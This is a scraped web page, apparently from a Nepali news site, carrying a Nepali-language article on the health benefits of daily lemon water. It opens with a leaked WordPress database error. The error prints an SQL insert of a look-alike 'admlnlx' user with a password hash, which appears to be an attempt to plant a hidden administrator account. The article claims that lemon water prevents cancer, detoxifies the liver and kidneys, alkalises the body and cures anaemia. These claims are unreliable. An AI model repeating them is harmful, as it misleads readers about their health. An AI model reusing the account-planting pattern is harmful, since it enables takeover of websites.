WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Boaqzm6ezgIJxpIwt3RgKEahEFwPq8/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 02:26:35', '', 'admlnlx', 'admlnlx')
एजेन्सी– दिनहुँ कागती पानी पिउँदा तपार्इँको स्वास्थ्यमा अपूर्व परिवर्तन आउँछ । कागती पानीले छालामा चमक ल्याउनेदेखि पेटको रोग समेत निर्मुल गर्छ । कागतीले शरिरमा उर्जा दिने, छुट्टै जोश प्रदान गर्ने र बुढ्यौलीपनबिरुद्ध लड्ने क्षमता राख्छ । कागतीमा भिटामिन सी र बि प्रशस्त पाइन्छ । कागतीमा कपर, क्याल्सियम, आइरन, पोटासियम र म्याग्नेसियम जस्ता मिनरल्स पनि पाइन्छ । कागती पानीको जुस रक्तचाप नियन्त्रण गर्न, रुघाखोकी र घाँटी दुख्ने समस्याका लागि निकै प्रभावकारी मानिन्छ । दिनहुँ कागती पानी पिउदा कब्जियता समस्याबाट छुटकारा पाउन सकिन्छ ।
रोग प्रतिरोधात्मक क्षमता बढाउँछ
यदि तपार्इँ चिसो मौसममा हिमालतिर जाँदै हुनुहुन्छ वा समुद्रको किनारमा घुम्दै हुनुहुन्छ वा पानी परेको समयमा बाहिर निस्कदै हुनुहुन्छ भने जानुभन्दा अगाडि भिटामिन सीयुक्त कागतीपानी खाएर सम्भावित चिसोबाट बच्न सक्नुहुन्छ ।
छालामा चमक
कागतीमा एन्टिअक्सिडियन्ट्स हुन्छ जसले सूर्यको कडा प्रकाश, प्रदुषण र एलर्जीपछि हुने छालाजन्य समस्याबाट बचाउँछ । भिटामिन सीले बुढ्यौलीपनलाई रोक्छ र अनुहारको छालालाई कसिलो बनाउँछ ।
तौल घटाउँछ
कागती पानीले शरिरमा हुने निश्चित चिल्लो पदार्थको मात्रालाई नियन्त्रण गरी शरिरको रगत र कलेजोको कोलोस्ट्रोल तहलाई घटाउँछ । शरीरमा हुने मेटाबोलिजम प्रक्रियालाई सशक्त बनाउँछ ।
अम्लियपनले शरिरमा क्षार बढाउछ
कागतीले शरीरमा भएको अम्लियपनसँग प्रतिक्रिया जनाई क्षार बनाउँछ । किड्नीले साबधानीपूर्वक रगतलाई नियन्त्रण गरी पीएच ७ दशमलब ४ बनाउँछ । तर, कागती पानी खाएर यसलाई हलुका बनाउन सकिन्छ ।
राम्रो पाचन प्रक्रिया
कागती पानीले आन्द्रालाई सफा गरि पाचन प्रणालीलाई सहज बनाइदिन्छ । आन्द्रामा रहेका उत्तेजित विकारलाई कागतीको अमिलोले एउटा फलसको काम गर्छ ।
कलेजो र किड्नीको विष हरण गरिदिन्छ
कागतीले कलेजोलाई सफा र कलेजोलाई सशक्त बनाइदिन्छ । कलेजोका इन्जाईमहरु कमजोर भएमा उर्जा प्रदान गर्छ र रगतको उत्तेजक पर्दाथलाई फिल्टर गरिदिन्छ ।
ऊर्जा दिन्छ
सामान्यभन्दा बढी थकित महशुस गर्नुभएको छ । राम्रोसँग सुत्दा पनि कमजोर भइरहेको छ ? यदि यस्तो लक्षण देखिएको छ भने तपाईँमा रक्तअल्पताको संकेत हो र भिटामिन सीयुक्त कागती एउटा अचुक औषधी नै हो । किनकी यसले तपाईको शरिरलाई आइरन सोस्न सहयोग पु¥याउँछ ।
क्यान्सरबाट बचाउँछ
एन्डिअक्सिडियन्ट र भिटामिन सीयुक्त कागतीले शरिरमा अनावश्यक तत्वहरुलाई नष्ट गर्न र क्यान्सरको खतराबाट बचाउछ ।
स्वस्थ शरीर
कागती पानीमा पर्याप्त पोटासियम हुन्छ जसले दिमागलाई स्वस्थ राखनुका साथै रक्तचापलाई नियन्त्रणमा राख्छ ।
ताजा सास
सुक्ष्मजीवाणू बिरोधी तत्व रहेको कागतीलाई पानीमा निचोरेर खाँदा तपाईको श्वासको दुर्गन्ध हटाउनुका साथै मुखमा हुने रोग लाग्नबाट बचाउँछ ।